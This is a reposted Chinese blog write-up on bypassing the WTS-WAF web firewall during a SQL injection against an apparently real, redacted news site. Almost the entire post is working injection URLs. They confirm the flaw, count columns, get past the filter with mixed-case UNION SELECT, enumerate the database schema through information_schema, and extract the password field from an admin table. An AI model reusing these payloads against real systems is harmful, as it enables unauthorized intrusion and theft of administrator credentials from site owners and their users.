记一次过WTS-WAF注入 - 码上快乐

相关内容简体繁体

记一次过WTS-WAF注入

本文转载自查看原文 2018-10-04 20:38 3984 渗透

http://xxx.com/news_blank.php?id=296 and 1=1

http://xxxxx.com/news_blank.php?id=296+and+1=1

http://xxxx.com/news_blank.php?id=296+and+1=2

确认是注入

http://xxxx.com/news_blank.php?id=296 order by 11  正确

http://xxxx.com/news_blank.php?id=296 order by 12 错误

http://xxxx.com/news_blank.php?id=296 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 拦截

http://xxxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,4,5,6,7,8,9,10,11--+

成功绕过

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,user(),5,6,7,version(),9,10,11--+

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name as char))),5,6,7,version(),9,10,11 from information_schema.schemata limit 1,2

获取数据库名

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,version(),9,10,11  from information_schema.tables where table_schema='hengdong' limit 0,1

查询表名

由于表名太多所以用python写了个脚本

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,version(),9,10,11  from information_schema.columns where table_schema='hengdong' and table_name='hdwl_admin' limit 3,4

查询字段名

http://xxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwd as char))),5,6,7,version(),9,10,11  from hdwl_admin

查询字段的内容

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 bypass WTS-WAF（sql注入+文件上传）记一次实战MSSQL注入绕过WAF 记录一次Oracle注入绕waf 一次简单的SQL注入绕WAF 记一次SQL注入实战记一次SQL联合查询注入工具的编写记一次spring里bean无法注入的历程记一次返工记一次NegativeArraySizeException 记一次面试

粤ICP备18138465号 © 2018-2025 CODEPRJ.COM